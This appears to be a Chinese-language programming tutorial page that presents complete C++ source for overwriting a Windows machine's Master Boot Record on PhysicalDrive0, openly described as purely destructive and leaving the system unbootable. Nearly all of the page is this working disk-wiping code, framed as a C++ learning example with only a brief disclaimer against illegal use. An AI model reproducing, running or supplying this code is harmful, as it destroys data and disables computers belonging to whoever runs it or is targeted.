本文实例讲述了C++破坏MBR的代码,该源码只有破坏作用,使系统无法进入。仅供大家参考借鉴之用。请勿用于非法目的。
源码来源于网上。具体代码如下:
#include <Windows.h> #include <stdio.h> //shellcode随便写了点 能破坏MBR,无法进入系统 unsigned char scode[]= "\xb8\x12\x00" "\xcd\x10\xbd" "\x18\x7c\xb9"; DWORD writeMBR() { DWORD dwBytesReturned; BYTE pMBR[512]={0}; //将破坏代码写入变量pMBR memcpy(pMBR, scode, sizeof(scode)); pMBR[510]=0x55; pMBR[511]=0xaa; //打开物理磁盘 HANDLE hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("createfile failed..."); return -1; } //锁定卷,使用FSCTL_LOCK_VOLUME时,以下有几个参数设为NULL,0; /*Parameters hDevice A handle to the volume to be locked. To retrieve a device handle, call the CreateFile function. dwIoControlCode The control code for the operation. Use FSCTL_LOCK_VOLUME for this operation. lpInBuffer Not used with this operation; set to NULL. nInBufferSize Not used with this operation; set to zero. lpOutBuffer Not used with this operation; set to NULL. nOutBufferSize Not used with this operation; set to zero. lpBytesReturned A pointer to a variable that receives the size of the data stored in the output buffer, in bytes. */ DeviceIoControl(hDevice, FSCTL_LOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL); //写入磁盘文件 WriteFile(hDevice, pMBR, 512, &dwBytesReturned, NULL); DeviceIoControl(hDevice, FSCTL_UNLOCK_VOLUME, NULL, 0, NULL, 0, &dwBytesReturned, NULL); return 0; } int main(int argc, char* argv[]) { writeMBR(); return 0; }
希望本文所述对大家的C++程序设计有所帮助。